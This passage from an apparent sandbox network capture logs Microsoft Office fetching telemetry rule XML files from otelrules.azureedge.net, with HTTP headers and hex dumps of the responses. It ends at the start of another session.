                                                                                                                                                                                                2024-11-20 09:54:38 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                137192.168.2.74984413.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:38 UTC192OUTGET /rules/rule701350v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:38 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:38 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1370
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                                ETag: "0x8DC582BDE62E0AB"
                                                                                                                                                                                                x-ms-request-id: 873207a6-301e-001f-2d8c-3aaa3a000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095438Z-185f5d8b95c9mqtvhC1NYCghtc0000000a4g0000000077ny
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:38 UTC1370INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                138192.168.2.74984513.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:38 UTC192OUTGET /rules/rule701351v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:38 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:38 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1407
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE687B46A"
                                                                                                                                                                                                x-ms-request-id: 4e85307b-101e-007a-398c-3a047e000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095438Z-r1d97b99577tssmjhC1TEB8kan00000008mg000000005msy
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:38 UTC1407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                139192.168.2.74984613.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:38 UTC192OUTGET /rules/rule702151v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:38 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:38 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1397
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE156D2EE"
                                                                                                                                                                                                x-ms-request-id: a615b14a-d01e-008e-6e8c-3a387a000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095438Z-185f5d8b95crwqd8hC1NYCps6800000009xg00000000h71q
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:38 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                140192.168.2.74984713.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:38 UTC192OUTGET /rules/rule702150v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:39 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:38 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1360
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT
                                                                                                                                                                                                ETag: "0x8DC582BEDC8193E"
                                                                                                                                                                                                x-ms-request-id: e2992adc-501e-005b-288c-3ad7f7000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095438Z-r1d97b99577lxltfhC1TEByw2s00000008ug000000001mx5
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:39 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f 70 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" /> <F T="2">


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                141192.168.2.74984813.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:39 UTC192OUTGET /rules/rule703001v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:39 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:39 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1406
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                ETag: "0x8DC582BEB16F27E"
                                                                                                                                                                                                x-ms-request-id: 947c99fd-001e-00a2-4d8c-3ad4d5000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095439Z-r1d97b99577hsvhhhC1TEByb1w00000002yg000000007xge
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:39 UTC1406INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                142192.168.2.74985013.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:39 UTC192OUTGET /rules/rule700751v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:39 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:39 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1414
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE03B051D"
                                                                                                                                                                                                x-ms-request-id: f390f01b-d01e-0017-588c-3ab035000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095439Z-1777c6cb754xlpjshC1TEBv8cc00000009m0000000005k2v
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:39 UTC1414INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                143192.168.2.74984913.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:39 UTC192OUTGET /rules/rule703000v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:39 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:39 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1369
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE32FE1A2"
                                                                                                                                                                                                x-ms-request-id: e9975653-d01e-0065-2d8c-3ab77a000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095439Z-185f5d8b95crl6swhC1NYC3ueg0000000a4000000000ed5q
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:39 UTC1369INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 4d 61 63 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703000" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookMac" S="Medium" /> <F T


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                144192.168.2.74985113.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:39 UTC192OUTGET /rules/rule700750v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:39 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:39 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1377
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:28:02 GMT
                                                                                                                                                                                                ETag: "0x8DC582BEAFF0125"
                                                                                                                                                                                                x-ms-request-id: 736e7e4b-801e-0035-118c-3a752a000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095439Z-1777c6cb754n67brhC1TEBcp9c00000009bg00000000k3fq
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:39 UTC1377INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 44 65 73 6b 74 6f 70 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookDesktop" S="Medium" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                145192.168.2.74985213.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:39 UTC192OUTGET /rules/rule700151v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:39 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:39 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1399
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE0A2434F"
                                                                                                                                                                                                x-ms-request-id: 107b52fc-c01e-00a2-5b8c-3a2327000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095439Z-185f5d8b95c95vpshC1NYC759c0000000a0000000000cv2z
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:39 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOn


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                146192.168.2.74985313.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
